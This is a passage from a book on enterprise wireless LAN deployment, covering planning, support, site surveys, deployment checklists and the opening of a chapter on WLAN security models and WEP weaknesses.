begins because this will avoid unnecessary delays during the actual implementation. Remember that you
might experience a lag of several weeks when ordering your equipment, depending upon the
manufacturer and the size of your WLAN.
As described in Chapter 3, based upon the throughput required to support your applications, the number
of users, the estimated number of concurrent users, the floor space to be covered and so on, you should
be able to roughly calculate the number of access points you will need. For enterprise deployments, this
is most often denoted as a "client to access point ratio"; this could be 10:1, for example, indicating that
you would deploy roughly one access point for every ten users.
However, if your plan is to deploy over a long period of time, you may wish to postpone purchasing
some of the equipment until the project is underway because this will avoid stockpiling equipment.
Security Posture
It is vital that you have clearly defined your security posture and put in place the required infrastructure
to support it before you begin deploying your WLAN. Factors such as the Extensible Authentication
Protocol (EAP) mechanism you select will help dictate what authentication, authorization, accounting
(AAA) infrastructure you need. If you have chosen to deploy in a geographically dispersed environment,
you may need to install additional AAA servers and perhaps even WAN circuits.
Deployment Dependencies
Before the first access point is turned on, the first cable laid, or the first client device enabled, you need
to be aware of some fundamental deployment dependencies. Your team may have finalized the
architecture and technical design, but you should ensure that centralized infrastructure and system-wide
policies are installed and implemented before the installation of the access points begins. You do not
want engineers turning up at a site to install access points or distribute clients before the site is ready for
them. We recommended that you perform at a minimum the following preparatory steps.
Change Management Process

Most large enterprises already have a Change Management process defined. The use of Change
Management will ensure that your deployment plans, or indeed the underlying architecture, does not
change during the implementation phase. Managing change and reducing "operational churn" reduce the
program costs and therefore help ensure a successful deployment.
Note
Change Management
The objective of change management is to execute changes economically and in a timely
manner while mitigating their risk and impact. Every carefully managed enterprise project and
services should have a change management process defined. This ensures changes do not
happen on a haphazard or uncontrolled manner.
This is achieved by the following formal steps. First, all requests for change are documented,
reviewed, and approved. Second, changes are appropriately developed and tested before and
after implementation. Third, implementation plans are documented, communicated, and
coordinated between change implementers and relevant end-users.
The effectiveness and benefits of change management include
Early detection of risks
Fewer service quality problems
Information on planned and implemented changes
Increased service stability leading to increased productivity
Ability to revert to prechange state
Improved management of high amount of change
Put the Supporting Infrastructure in Place

Ensure that sufficient wired and supporting infrastructure is in place. This includes providing sufficient
wired Ethernet ports for each access point and confirming that you have sufficient power capacity
(whether AC sockets or Power over Ethernet ports on your switches). Additionally, if your architecture
calls for a dedicated wireless switch or WLAN controller, ensure that your existing infrastructure supports
it or any additional integration testing, equipment, and design has been completed.
Provision AAA Capabilities

Ensure that the AAA architecture is in place, tested, and functioning. It's important not to end up testing
your AAA system on the first day of production services. Stress test the AAA solution. Depending upon
the size of your client base and the mobility, you may see a dramatic increase in the number of
authentication transactions. Be sure that your AAA servers are capable of supporting the additional load
created by roaming clients. You may also be deploying your WLAN across geographically disparate
locations, either nationally or internationally. Investigate whether you need to place AAA servers at other
locations to ensure service stability or to avoid WAN congestion.
Define Security Standards and Policies

Make sure your security standards and policies are defined, published, and clearly communicated to your
users. For example, you may have decided that wireless networking hardware is prohibited unless
installed by your IT department, yet discover that certain departments or workgroups are already using
self-installed networks when your deployment team arrives onsite. Besides being a security liability
equivalent to rogue access points, this will cause problems during the site survey and disruption to the
productivity of the workgroup involved. It is important that you share your plans, policies, and
procedures before you begin because this will avoid unnecessary confusion among your user
community.
The following sections clarify the differences among security standards, policies, and procedures.
Security Standards
Security standards industrywide and are defined by external bodies such as IEEE or the WiFi Alliance.
802.11i is an example of an IEEE standard. WPA (WiFi Protected Access) is an example of a WiFi Alliance
standard. Security standards define technical specifics on how security controls are applied or
implemented by wireless hardware, and sometimes how compliant devices must interact and operate
with each other.
Security Policies
Security policies are the management, business, and technical decisions that your enterprise has made
regarding wireless security. For example, you may have a wireless security policy that states that only
your IT staff members are permitted to install access points. You may have decided that only devices
that support WPA (a cross-industry WLAN standard) are allowed on your network; that would be a policy
defining what standard is to be used on your network.
Security Procedures
Wireless security procedures are business processes that dictate how your staff members handle and
deal with specific events. It is no use defining what standards should be used or restricting what devices
are permitted unless your staff members know what to do when these standards and polices are
contravened. Wireless security procedures can effectively be thought of as "operating instructions" on
what your staff should do in certain circumstances.
Put the Support Plan in Place

Make sure you have clearly defined a support plan and that your IT staff understands it. This defines
how your user population is supported, who they call, how their questions are handled, and so on. For
example, your support plan should detail who staff call with problems (usually a helpdesk of some sort),
what level of technical expertise the helpdesk should have, how they handle cases they cannot answer,
and to whom they escalate to. It effectively should define who shall provide frontline, second line, and
third line escalated support; this is also known as Tier 1, Tier 2, and Tier 3 support.
As you deploy your solution, you will almost certainly enable each site in turn. The initial period of user
adoption and familiarization is perhaps the most turbulent and support-intensive in any solution lifecycle.
Your users will undoubtedly require and request support, training, perhaps electronic learning, and
maybe even simple presentations on the benefits of the new technology. Many deployments have failed
or resulted in poorer than expected adoption simply because the IT department installed the
infrastructure and "walked away." Your support staff, whether the IT department itself or a dedicated
support desk, must be aware of the project, appropriately trained, and capable of resolving the most
common errors.
Put the Communication Plan in Place

Always think about the customers. In this case, the customers are the users of the WLAN. Users like to
be kept informed and are more willing to embrace a technology or solution if they understand both its
benefits and limitations. Make your users aware of what the WLAN solution provides, when it shall be
made available at their sites, how to use it, and where to turn for help. Not only will it help market the
WLAN to your end users, but it will also ensure that they understand the benefits and goals of the
solution. User satisfaction is an often overlooked but very important factor in any successful technology
solution.
Make sure your users are aware of the deployment schedule. Not only will this help manage their
expectations, but it also will help avoid constant support calls requesting service and dissatisfaction on
the progress of implementation. It may even help avoid or reduce rogue deployments.
Explain the basics of WLAN security and networking concepts. Many users will be vaguely aware of
security concerns associated with wireless. Some will have no experience with the technology and may
be skeptical of its benefits. Others may be early adopters who have already embraced the technology.
By sitting down and sharing a broadly based communication plan, you can inform your users of the
project's goals, who and what will be supported, and when they can expect service at their location.
Explain the basics of WLAN security and networking concepts. Users like to be kept informed and are
more willing to embrace a technology or solution if they understand both its benefits and limitations.
Clearly state what is permitted and what is not. Then explain why. Most users will modify their behavior
if they fully understand the repercussions of their actions and will gladly conform to security policies if
they understand that they are based upon sound business reasons and not simply diktats from a
shadowy IT or Information Security department.
With the advent of cheap access points, the likelihood of self-installed, rogue deployments has increased
dramatically. Users should be made aware of the risks associated with non-IT endorsed solutions, the
risks of enabling ad-hoc wireless networking, why enabling both wired and wireless interfaces on their
computer at the same time is not recommended, and so on. You should also consider going one step
further and offering your staff basic instructions or "best practices" on how to securely configure their
own home wireless networks.
Develop and publish FAQ (Frequently Asked Questions) sheets. Identify what you believe will be the top
10 or 20 questions from users and make this available via e-mail, a company internal website, or even in
hardcopy during client distribution.
Finally, you may also wish to develop electronic learning collateral. The larger your corporation and
deployment, the more likely you will already have an official internal training and learning service
available. Even if you do not have such a division, producing simple and relevant material is worth the
time and effort. You may consider creating a solution web page or "dashboard" on an internal corporate
intranet. This would be an ideal location for communication and training collateral and somewhere to
refer interested users for project updates and schedules.
Address Regulatory Issues

Some locations have specific regulatory requirements. The number of 802.11b channels available can
even change depending upon the country in which you install WLAN equipment. In the United States,
the Federal Communications Commission (FCC) regulates equipment that is permitted in the 802.11
frequency bands. In Europe, it is the ETSI, or the European Telecommunications Standards Institute. No
matter where you deploy, chances are that regulations are governed by a regulatory agency, the most
common of which are listed here:
United States: FCC
Europe: ETSI
Canada: Industry Canada
Taiwan: DGT
Japan: TELEC
China: MII
India: DOT
It is important to familiarize yourself with local regulatory requirements and ensure that your network
complies with the appropriate legislation.
Management
Ensuring that you have a robust management system in place is as important as its design and
implementation. After you have installed the infrastructure, distributed the clients, and enabled the
solution, you will have ongoing management to consider. This is especially important in large
deployment, where it is not uncommon to encounter several thousand access points and tens of
thousands of clients. It is therefore prudent to also consider this during the design and implementation
phase. Chapter 8, "Management Strategies for Wireless LANs" covers this topic in much greater detail.
However, a brief overview is provided here.
There are two facets to managing an enterprise-class wireless network:
Managing the infrastructure
Managing the clients
Managing the Infrastructure

Infrastructure issues will include configuration management, image (or firmware) maintenance,
maintenance and security settings updates, and so on. Many enterprises will already have an existing
network management solution in place. Ensure that your wireless infrastructure can be seamlessly
integrated with this system.
Wireless networks also pose unique challenges, such as radio management, rogue AP detection, and
radio optimization. Several wireless equipment manufacturers produce management toolsets specifically
geared toward their WLAN products. If you choose to deploy these, you should consider how to integrate
them with any existing network management platform you have and where to locate the management
servers/appliances. (If you have a geographically dispersed environment, carefully decide where to place
it in your infrastructure as it will have a direct impact on performance.) You should also ensure that your
IT and support staff have appropriate training with the toolsets provided.
Retrofitting a management platform after your infrastructure deployment is complete will be both costly
and resource intensive. It makes much more sense to consider this as part of the standard deployment
process.
Managing the Clients

Client management is very important for all large-scale wireless deployments. As your WLAN grows and
evolves, you will probably need to revisit client devices at some stage. Security settings may need to be
changed, user and security profiles distributed or modified, or firmware and client software updated. If
you have several thousand clients, this can be extremely resource intensive and therefore costly.
Although it is true that most of your client settings can be configured during the initial client distribution,
you should also plan for some manner of updating and managing your clients in the future. Many
corporations already have client management software available to handle their desktop systems, such
as LANdesk, Altiris, Microsoft SMS, or Symantec LiveState. If appropriate, ensure that the existing client
management platform can handle updating your wireless software. Alternatively, some wireless solution
manufacturers provide administrative and management toolsets with their software that is dedicated to
updating and managing wireless client software and devices. If you choose to use these, ensure that
your support and desktop engineering staff are familiar with them.
Support
By their very nature, wireless networks are complex and susceptible to interference and potential
service-impacting factors that wired networks avoid. A carefully designed WLAN, and the use of the
latest intelligent WLAN equipment, will help avoid these problems. However, you will undoubtedly
encounter specific wireless-related issues during the support of your solution.
It is important that you develop a clear technical support framework. Your technical support staff should
be trained in common wireless-related problems, and a tiered support structure is recommended, as
follows:
Tier 1 (or helpdesk support) should be familiar with common WLAN problems and issues.
Tier 2 is usually a support team that handles more complex problems escalated by the helpdesk;
this tier is often made up of IT engineers or analysts who were personally involved in the
deployment or who have been specifically trained in wireless networking issues.
Tier 3 support may be a senior team of wireless or networking experts, or it may denote an
escalation path to the actual solutions provider or equipment manufacturer.
Regardless of the possible installation of management hardware or software, your support framework
should be in place before you commence deployment. As mentioned elsewhere in this chapter, the initial
adoption phase will be the most support intensive, and you will undoubtedly see a spike in the number
of support calls and cases during this time. Your support staff, whether you have a tiered framework or
not, should be prepared for this and ready to assist your users.
Deploying the WLAN

Deploying your WLAN will likely be a complex process-driven effort. It will require careful project
management and scheduling to ensure smooth transitions between each set of tasks. In this, it is not
unlike any other technology implementation once the architecture and design have been defined.
There are usually multiple groups or teams involved in a WLAN deployment. These will include your core
IT wireless team, your cabling vendor, the group responsible for workplace resources (power,
occupational health and safety, office management, and so on), your technical support organization,
network operations staff, and any external vendors you select to assist in the deployment. Large
enterprises will most likely also have a program management team to oversee the multiple installations
and sites, manage the multiple projects, report to the stakeholders, and controls costs. Although the
program management team may not be considered an integral part of the deployment per se, it will
likely be involved in the day-to-day implementation.
Figure 6-2 shows the relationships among groups involved in a typical deployment. It is important to
carefully manage these relationships and ensure that good project management techniques are used to
avoid unnecessary delays or problems.
Figure 6-2. Possible Deployment Teams and Their Relationships
The following section describes some of the key tasks and activities required during the deployment
phase.
Pre-Deployment Tasks
At this stage, you should have decided whether to use external vendors to assist in the deployment. If
you have chosen to use external vendors, ensure that they are familiar with your existing network
infrastructure, the scope of deployment, the locations of each site, and the fundamentals of your
wireless architecture. Some time spent on transferring information to your vendor will help avoid later
confusion and delays.
Independent of retaining outside help, you should have a detailed project plan and implementation
schedule in place. The relevant IT resources should be assigned, and the team should be familiar with
the architecture. It is possible that a pilot network will have been undertaken to validate your
architectural decisions, familiarize your IT staff with the technology, and test the solution. Indeed, for
larger deployments, a pilot is highly recommended.
A communication plan should by now have been undertaken, and your end users should be aware of the
upcoming technology, your security standards and wireless policies, when they can expect to receive
their client hardware (if necessary), and when the service will be launched at their site.
Managing the Deployment

The actual deployment of the WLAN will most likely follow a number of common steps for each site. The
makeup of the teams involved will depend upon your choice of IT staff, the use of internal staff or
external vendors, and whether local resources are available. Each set of tasks should be assigned to a
team, yet all teams should understand the entire end-to-end process.
Figure 6-3 shows a typical process flow for common tasks in a large multisite deployment. The list is not
intended to be all-inclusive but rather is indicative of the process flow and task assignment you will likely
encounter. The illustrated case uses a WLAN solutions provider (the "vendor") to provide additional
project resources. Even if you use your own internal resources for the entire project, the tasks and
process flow would remain roughly the same.
Figure 6-3. Example Site Installation Process Flow

Site Data Collection and Validation

Ensure that you have a comprehensive list of all sites in which you will deploy. Site contacts (local IT
staff, reception, shipping, health and safety, and office management) should be collected in a "site
database" or contact list, including phone, fax, and e-mail addresses. A "site owner" could be assigned
from your IT team. This person would be responsible for configuring the devices or managing the
specific site installation; alternatively, a project manager can fill this role.
Ensure that you have details such as office opening and closing times, local delivery restrictions, and any
upcoming events such as office closures, construction, vacations, and so on.
Finally, it is recommended that you source or produce current floor plans for your office. You should note
the location of all cabling (if possible), power outlets, and ideally the composition of internal walls,
because these will affect WLAN signal strength, and ultimately quality and throughput. This information
is useful during the site survey phase. Most of this information can be found in architectural or office
blueprints if you have them.
Local Infrastructure Upgrade or Modification

Have your site owner (the IT staff member responsible for the site) take stock of existing infrastructure
at each site before your installation team visits. The site owner should do the following:
Confirm that there is enough inline power or power points available
Make sure that you have sufficient rack space
Ensure that you have enough switch ports available
Verify that you have sufficient console ports available if you are cabling the access points for
console access
Much of this is predicated upon earlier architectural decisions, but it is important that you collate and
validate information on each site to avoid surprises later.
If you do not have sufficient infrastructure capacity, you should plan to modify, upgrade, or install what
you need before the first site visit by a WLAN team. This in turn will affect your project plan and
resource requirements. In other words, make sure the supporting or foundational enabling infrastructure
is capable of supporting the access points and controllers. Don't leave yourself vulnerable to discovering
halfway through an installation that you've run out of Ethernet ports on your switch, for example.
Firmware and Configuration Updates

Ensure wireless network adapters have the latest firmware and software drivers. This may require
manually flashing each card or downloading the latest software. The same is true for embedded wireless
clients (such as those in ASDs or embedded wireless cards in newer-model laptops). Note that for large
deployments of several thousand client devices, updating firmware and software drivers becomes an
increasingly complex and time-consuming challenge. We recommend a structured and tested approach
for managing such environments. Refer to Chapter 8 for recommended practices.
Client Distribution
Understand how you will distribute the cards and software. You may wish to ship client adaptors to a
local mailroom or IT contact for each site and delegate the distribution among your users to them.
Alternatively, you may use internal mail to send client hardware to each user individually, or you may
select a "client pickup" model. Ensure that your users and local staff are aware of which option you
choose. Also ensure that you also provide training or informational collateral to your users at this stage.
FAQs and installation instructions are usually included.
Shipping and Handling

Assign responsibility for actual shipping of hardware to each site. This includes not only the client
adaptors as described in the preceding section, but also the access points and any wireless switches or
dedicated hardware you may need. If you need to upgrade local infrastructure, make sure it is
dispatched and installed before the wireless equipment.
The management of shipping and handling alone can be a significant administrative overhead, especially
in international deployments. Ensure that you have a team that is familiar with this process. Expect
customs requirements (and delays) and plan accordingly.
Decide on whether and where you will maintain a stock of standby and replacement equipment, for
example, at each site or in a centralized location.
Site Survey
The site survey is perhaps the most important of all deployment tasks. This process dictates where you
will locate the individual access points to provide the level of service you have defined in your
architecture. The throughput you require for your applications and the estimated number of concurrent
users will provide you with a rough estimate of the number of access points you will need per floor or
site.
Your solutions architecture, or automated WLAN management tools, will dictate such issues as desired
cell overlap, throughput required to support your applications, user to access point ratio, radio
transmission power, and whether you lock your access points to a single speed (data rate). Using this
information in conjunction with the floor plans you collected earlier will allow you to plan for the number
of access points per site. No amount of planning can account for environmental issues impacting your
WLAN, local site interference, or attenuation caused by internal office construction. You must install the
access points in locations and configure their settings such that they actually provide the service you
require. A formal site survey will validate this information and find the most appropriate location for the
access points.
Site surveys can typically be undertaken in two ways:
Automatic
Manual
You may select an automatic site survey (sometimes called RF Prediction) and use tools provided by
your WLAN equipment vendor to configure the access points once they are physically installed. These
WLAN management products (like the Cisco Wireless LAN Solutions Engine or Wireless Control System)
not only offer assisted or semi-automatic site survey capabilities but also allow you to import floor plans
to get a visual representation of your WLAN, interference, client data, and so on. The access points are
then powered up, and the centralized wireless controller or management device auto-discovers and
auto-configures them with optimum settings.
In some circumstances, an automatic or assisted site survey may require you to take measurements at
various locations throughout the floor to add additional data points. These can help improve the
accuracy and appropriateness of the automatic configuration settings. Finally, some WLAN products (like
the Cisco Centralized WLAN Solution using wireless LAN controllers) automate the access point
configuration entirely and your IT staff need not configure them at all. This can offer significant savings
in time, effort, and expense because your IT staff members do not have to be wireless experts or spend
time configuring each access point.
The traditional site survey technique calls for a manual process. The engineers choose locations for the
access points based upon "best guess," taking into account the floor plan, the transmit power, and cell
overlap defined by the design and then temporarily place access points in these locations. They then
perform a walkabout measuring the signal strength, cell size, and roaming characteristics using a
wireless site survey software application. This can be the software provided by the WLAN equipment
manufacturer (such as the site survey utility Cisco bundles into its software) or a third-party tool
designed specifically for site surveys or wireless diagnostics, such as AirMagnet. If any dead spots are
discovered, or if the signal strength and overlap do not meet the defined characteristics, the access
points are moved and fine-tuned. Challenging environments like factories sometimes employ external,
more powerful or directional antennas.
Whatever survey strategy you select, the output is the same. The result is a list of access point locations
and settings that provide the coverage and bandwidth you need for that individual site. The list is then
used by the implementation team to identify the exact placement of access points during the
deployment, as well as by operations staff as an asset log for troubleshooting purposes.
It is important for you to document the site survey. Create a "site pack" for each location, which includes
copies of the floor plans, showing the final locations of the access points, a table of all access points with
information on their name, configuration (transmit power, channel, antenna type, and so on), and details
such as their switch and console port number. It is also useful to include a digital photograph of the AP
location. Don't forget to update the site-pack whenever changes are made or new access points are
installed. An outdated site-pack can cause more problems than none at all.
Cabling
Once you have calculated the position of the access points, you must cable each location. Typically, this
will require the use of plenum-rated cable (cable certified for fire resistance) to enable you to string the
cable through raised floors or dropped ceilings. Each access point will require at least one network cable.
If you have opted to provide console access to your access points, an additional cable will be needed.
Console access will allow you to engage in out-of-band management and troubleshooting.
Finally, you will need to ensure that the access point is provided with DC current. This may require the
installation of an AC mains power socket at or near the access point location. Alternatively, you can
power some access points with inline power that is provided by the network switch via the Category 5
twisted pair cable. This is known as Power over Ethernet.
Access Point Installation

Next comes the physical installation of the access point. You may choose to fit the access points to office
walls or building columns or hide the access point in the dropped ceiling and only leave the antennas
visible. Special plenum-rated metal or NEMA enclosures are also used and are sometimes required for
manufacturing or industrial areas. In any case, this is when your team physically installs the access
point, connects it to the cabling previously laid, and powers up the device.
WLAN Controller Configuration

In centralized WLAN solutions, the WLAN controllers themselves need to be configured. This is often
undertaken around this stage, typically before the physical installation of the access points. The WLAN
Controllers are configured with appropriate settings for each building or site. This can be done on-site or
before the controllers are dispatched.
WLAN Controller Installation

In centralized WLAN solutions, the WLAN controller should now be physically installed. This is important
because it is this device that actually configures, manages, and "controls" the access points themselves.
Without the controller present and operating, the access points will not function.
Access Point Configuration

Now that the access point has been physically installed, connected to your network, and powered, you
can finalize its site-specific configuration. Depending upon the product you have deployed, access point
configuration (and management) may be handled automatically by a so-called WLAN controller or WLAN
switch, or you may need to configure the access points individually.
Access points that require individual configuration can be handled by your WLAN deployment vendor (if
you have chosen one) or your own internal IT staff. In the former case, you will need to provide network
access to your vendor, along with configuration details and security settings. As a result, many
enterprises prefer to carry out this step themselves.
Access points that are automatically configured by a WLAN controller or WLAN switch are usaully easier
to deploy. Each model (centralized, WLAN controller-based, or distributed, access point-based) has its
advantages and disadvantages that you will have examined and evaluated during your architecture
phase.
Testing
Once the access points have been installed and configured, you are ready to begin testing. This is a vital
step in any deployment, as this allows you to detect any potential problems before the service is
launched. This, in turn, avoids unnecessary support costs and helps reduce the TCO. Larger, multisite
deployments may justify formalizing this into a systematic post-installation acceptance test, but even
smaller-sized deployments should undertake some tests. The test plan should include
Connectivity of access point to rest of the network
Successful authentication (login)
Successful roaming from AP to AP
Throughput testing
Validation of cell overlap
Validation of coverage
Include a copy of the post-installation acceptance test as an addendum to the site survey document.
That way you not only have a written record of the WLAN installation for that site, but you also have a
copy of the test validating the settings and AP locations. This can be particularly important for wireless
networks because many factors can change the environment. Troubleshooting may be aided by
understanding what was known to work at the time of installation.
Client Installation
One of the final tasks that you must undertake is the actual installation of the client adaptors and
software. This may require your users to self-install the software from a centralized server, or they may
have the software preinstalled on their laptops. Many large enterprises have automatic software
distribution frameworks (such as those provided by LANdesk, Microsoft SMS or Altiris), and these can be
used to good effect. Even though some operating systems support wireless networking natively (such as
Windows XP and MacOS), we recommend using dedicated client software provided by equipment
manufacturers if possible as they provide richer feature sets and more detailed configuration capabilities.
These tend to have significant additional features that both users and IT staff find useful.
Today, the majority of devices will have the wireless adaptor already embedded. This includes newer
laptops and many ASDs. However, some devices may require you to provide a wireless adaptor, usually
a PC card (PCMCIA) or sometimes a USB or CompactFlash card. The form factor is not important; rather
it is a controlled method in distributing these to your user base. Ensure that the adaptors have been
flashed and have the latest firmware, drivers, and software. This may present an additional challenge for
embedded clients but should not be overlooked.
When you are distributing the client adaptors or software, make sure to provide a communication pack
to the user. This should include FAQ, some information on the wireless technology and security you are
adopting, the goals of the solution, and basic instructions on how to use the service, including calling
technical support.
Production Launch
Your site is ready for production services. You have performed the site survey, installed the equipment
and supporting infrastructure, configured the wireless settings, tested the service, distributed the client
hardware, and communicated the status to your end users. Expect an initial surge of interest in the
service and a high number of technical support calls. Ensure that your technical support organization is
aware of and expecting any impending site launches. Ideally you should avoid too many service
launches within a short period of time, because this will allow your first-and second-line support teams
to handle the spike in cases. You may also encounter a few teething problems because production status
may highlight some overlooked configuration errors and provide much more intensive "stress testing."
You should allow for some technical resources (second-and even third-level support) to be available
during the first week or two of usage. Close monitoring of the service is also recommended in the early
stages. This will enable you to validate the design and detect problems early.
Deployment Checklist
This section includes proposed checklists of minimum activities and considerations recommended during
the design, deployment, and implementation of a wireless LAN solution.
The aim of this checklist is to prompt you to consider all aspects of the deployment, and not simply the
physical installation of the infrastructure. Each step should be considered a specific project deliverable,
process, or document.
The following checklists are not to be considered all-inclusive, but are examples only. Please refer to the
appropriate chapters that cover planning and preparation (Chapter 3), supplementary services (Chapter
4), architecture (Chapter 5), security (Chapter 7), and management (Chapter 8) for more detailed
discussion. Note also that every installation is unique.
Architecture
Use the following checklist as a guideline when considering your network architecture:
Determine whether the WLAN is a mobility/productivity enabler or simply another transport
medium.
Determine whether a pilot deployment is required, or proceed to full-scale deployment.
Based upon preceding points, define internal support SLAs.
Define WLAN architecture.
- Centralized Controllers based solution versus distributed autonomous AP solution.
- Traffic/application type
- Selection of standard (802.11a, 802.11b, 802.11g, etc.)
- Scalability
- Single site
- Campus
- National deployment
- Global deployment
- Security
- Open (not recommended)
- Static WEP (not recommended)
- Dynamic WEP (that is, EAP-based)
- 802.11i / RSN
- VPN overlay
- AAA integration
- RF planning
- IP address scheme
- Wireless VLANs
- Data
- Voice
- Guests
- User to access point ratio
- Quality of service (QoS)
Document final architecture.
Deployment Methodology and Project Planning

Determine deployment resource requirements using the following checklist as a guide:
Outsource to trusted vendor or handle with internal staff.
Identify project dependencies.
- Wired network infrastructure (complete if necessary)
- Power
- AAA (install if necessary)
- Security posture defined
- Security standards and policy
Produce project plan.

If using vendors:
Identify vendor capabilities.
- Cabling vendor
- Solutions provider
- WLAN certified experts
Delineate vendor/in-house responsibilities and workflow.
Define vendor SLA and contract.
Document vendor work orders, including engineer instruction sheets.
Define site survey documentation requirements.
Define and document post-installation acceptance test.
Clients
Consider the following points about your clients:
Enumerate number of clients and platform.
Decide on client form factor.
Ensure client interoperability.
Purchase client adaptors (if necessary).
Ensure client adaptors are at latest firmware level and "flash" if necessary.
Define client adaptor distribution method: pick-up model vs. distribute model.
Define client software distribution method.
- Individual user installs
- Centralized software distribution method (Altiris, SMS, etc.)
- Recall model
- Self-service model
Educate users.
- Deployment characteristics
- Application support
- Coverage area
- Roaming issues
- Develop user FAQs
- Communication plan
- User training sessions
- Self-service web-based training
Implement support plan.
- Educate enterprise helpdesk
- Tier 1, Tier 2, and Tier 3 support
- SLAs
- Vendor support agreements
Infrastructure
Use the following checklist as a guide when considering your infrastructure:
Purchase hardware (for example, APs, switches, and so on).
Identify firmware level of hardware and "flash" if necessary.
Manage the network.
- In-house
- Appliance
- Third party
Establish naming conventions.
Differentiate inline power vs. AP power supplies.
Determine whether APs will be cabled for console access.

Secure the access point.
Deployment
Consider the following points regarding your deployment:
Carry out site survey (in-house or vendor).
Produce site survey documentation.
Determine cable AP locations (data, console, and power, if applicable).
Install WLAN controllers (if appropriate)
Install of APs.
- Physical security
- Location (visible vs. concealed)
- Labeling
Configure APs.
- If required, apply standard configuration (IP address, shared secret, host name, and so
on): Individual vs. network management method
- Integration into network management system
Configure access/distribution network.
- Switches
- VLANs
- Console servers
Perform post installation test: In-house vs. vendor.
Move into production status.
Complete client distribution if necessary.
Summary
In this chapter, you have learned that a structured and carefully planned approach to the actual
deployment of WLANs is important. Take time to consider all the tasks that lie ahead of you. If you are
embarking on a major deployment, you may wish to consider outsourcing some of the tasks and
responsibilities to a third-party wireless integrator. If you choose this option, make sure you explicitly
define roles and responsibilities, ensuring that each party is fully aware of the endto-end process.
Involve all members of your extended team in the deployment process, and do not limit it to IT.
Technical support, workplace resources, finance, and even HR have parts to play. The call for teamwork
also exists within the IT organization. Wireless projects generally require groups responsible for user
databases, client support, networking, and security to work together. In some cases, a wireless project
might be the first time people from these different organizations have had to work together.
Create a clear and concise client communication plan to keep your user base informed. Define the actual
deployment checklist for each site and ensure a consistent approach for each installation. This will save
you time and money throughout the deployment.
A careful site survey (manual or automated) is a must for a successful solution, and you should ensure
that you maintain clear and comprehensive documentation. Upon completion, test the installation and
document all results in a "site pack" for each location. Finally, when launching the service for each site,
plan for a higher-than-normal number of technical support calls as users become familiar with the
technology and any bugs are ironed out by your technical team.
Chapter 7. Security and Wireless LANs
The purpose of this chapter is to provide you with enough information to tackle the challenge of securing
your WLAN infrastructure. This book repeatedly mentions the need for a security posture because
security in your network is only as strong as the weakest link. This chapter provides an overview of key
security components in WLANs, fundamental security vulnerabilities, key WLAN security standards, and
security management challenges.
Wireless Security in Your Enterprise

The fundamental premise of security in networked environments is that no network is truly secure. Even
a network that is not connected to the Internet can be compromised if physical access can somehow be
obtained. This point further drives home the point that there is no perfect way to secure a network.
To approach security, you need an awareness of the components that determine how to secure your
infrastructure while maintaining an attitude of elevated paranoia. You should always assume that at
some point in time there will probably be an attempt to break into your network with the goal of
compromising intellectual property or disrupting your business.
Attacks don't necessarily come from the outside. Research from the Computer Security Institute (CSI)
and the FBI has shown that most security attacks come from the inside of an enterprise:
(http://www.gocsi.com/forms/fbi/csi_fbi_survey.jhtml). (The document is free after registering at the
CSI website.)
These attacks can be intentional, such as a disgruntled employee, or unintentional, as in the case where
a computer is infected by a virus. The unintentional act is more likely to happen and probably more
destructive. Armed with this state of healthy paranoia, you can strike the delicate balance between how
much you invest to secure your infrastructure and the degree of difficulty an attacker needs to
overcome.
Thinking Securely
The broadcast nature of a wireless network effectively raises the importance of authentication,
encryption, and hashing. Starting with Authentication, you want to be sure that only permitted parties
can communicate with your APs. Because you are effectively broadcasting your message over the ether,
everyone can potentially hear every communication. Encryption is, therefore, needed to ensure
communication privacy. Finally, the broadcast environment makes it relatively easy to capture, modify,
and resend a message. Hashing your messages will address this problem.
Literature on information security typically uses the example of communication between two people. This
section does the same, using the example of communication between Tony and Kelly. The specific
security challenges that Tony and Kelly face when communicating are
Tony and Kelly need to know that they are indeed communicating with each other. This is known as
authentication of the communicating parties.
Tony and Kelly want to be sure that only they can interpret the message exchange. Encrypting the
messages into ciphers that only Tony and Kelly can decipher achieves this goal. Keys are used to
lock and unlock the messages. These keys can be static or dynamic, and symmetric or asymmetric
(Public/Private). The combination of the respective key characteristics determines how secure the
solution is but also the computational cost.
Finally, Tony and Kelly want to be sure that the messages have not been tampered with while the
messages were in transit. This is achieved by attaching a checksum (hashing) to the message that
is recomputed and compared upon receipt. If the checksum is the same, the messages have not
been tampered with.
It is not impossible to ensure secure wireless communications. Securing WLANs is possible if done
correctly. However, heightened awareness is required to ensure that you don't overlook a critical
component and thus create a back door.
Note
It might not be possible for you to think like a hacker, but it is not necessary, either. What is
important is to establish a security posture that identifies the parts of your network (or
information that passes through it) that are most sensitive and need protection.
Different Security Models

Depending on how you decide to combine the security elements mentioned in the preceding section,
different security models are appropriate. This section describes the most commonly adopted models,
which include the following:
No authentication, encryption, or hashing
Native encryption only
Native authentication only
User-based authentication
Machine-based authentication
Native encryption and authentication but no hashing
Authentication and encryption using overlay security solutions
No Authentication, Encryption, or Hashing

By providing no method of authentication, encryption, or hashing, your network is most open to attack.
However, an attack doesn't necessarily mean that an individual wants to break into your network with
malicious intent. It can also mean that an individual inadvertently attaches to your WLAN and uses your
network resources.
Even though this model leaves you most open to unauthorized use of your WLAN, sometimes you will
choose not to authenticate users or encrypt data. One such situation is when you want to provide your
guests with WLAN connectivity.
Note
On occasion, little or no WLAN protection is available for proprietary devices or unique
operating systems.
Native Encryption Only

Because WLANs use radio as a transmission medium, the first line of defensephysical medium control
and containmentas offered by wired networks is not present. Indeed, LANs are somewhat protected by
their physical structure, with some or all parts in a building or underground. To provide some kind of
physical isolation similar to wired LANs, the 802.11b standard defined the Wired Equivalent Privacy
(WEP) security protocol. WEP intends to provide some degree of privacy by encrypting the information
between the radio endpoints.
Because WEP was designed when WLANs were in their infancy, it is not surprising to see that WEP
turned out to be less effective than initially expected. WEP does not provide true end-to-end security
because it only operates at the two lowest layers of the OSI model: the physical and data link layers.
Note
Any time you expose a standard to the general community, you risk compromising the
standard because hackers can reverse-engineer the standard to develop an exploit.
In addition, WEP uses a static symmetric key to encrypt the data. The key's static nature is a challenge
because key management becomes complicated and a vulnerability is created that propagates to other
parts of the security chain. Key management challenges include
Distributing keys
Supporting timed changes
Determining how to address the physical loss of end devices
Finally, WEP employs a key length of 48 or 128 bits. Given the continued and accelerated growth in
computing power, standard desktops are now capable of quickly breaking these keys through exhaustive
searches.
Native Authentication Only

Authentication and authentication protocols control access to a network. Keep in mind that
authentication does not secure the data that is transmitted on the network. Authentication protocols are
designed to ensure that the user or device that is attempting to communicate is indeed whom it claims.
It is analogous to a secured door in a large office building. By swiping your identity card, you are
